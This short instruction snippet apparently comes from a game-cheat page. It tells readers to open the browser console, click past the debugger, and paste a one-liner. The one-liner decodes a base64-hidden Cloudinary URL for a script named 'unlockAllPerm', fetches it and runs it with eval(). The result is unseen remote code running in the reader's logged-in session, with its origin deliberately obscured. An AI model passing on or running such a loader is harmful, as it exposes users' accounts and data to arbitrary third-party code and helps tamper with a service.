if you run one of the codes and get this: don't worry all you have to do is go to the sources tab: and click this: top right, lastly click this: to get out of debugger
Open console (ctrl + shift + j) and paste the following:
fetch(atob("aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZG0yaG9hNDVxL3Jhdy91cGxvYWQvdjE2Mzg1NjczNzkvdW5sb2NrQWxsUGVybV9iZW5peTMuanM=")).then((res) => res.text().then((t) => eval(t)))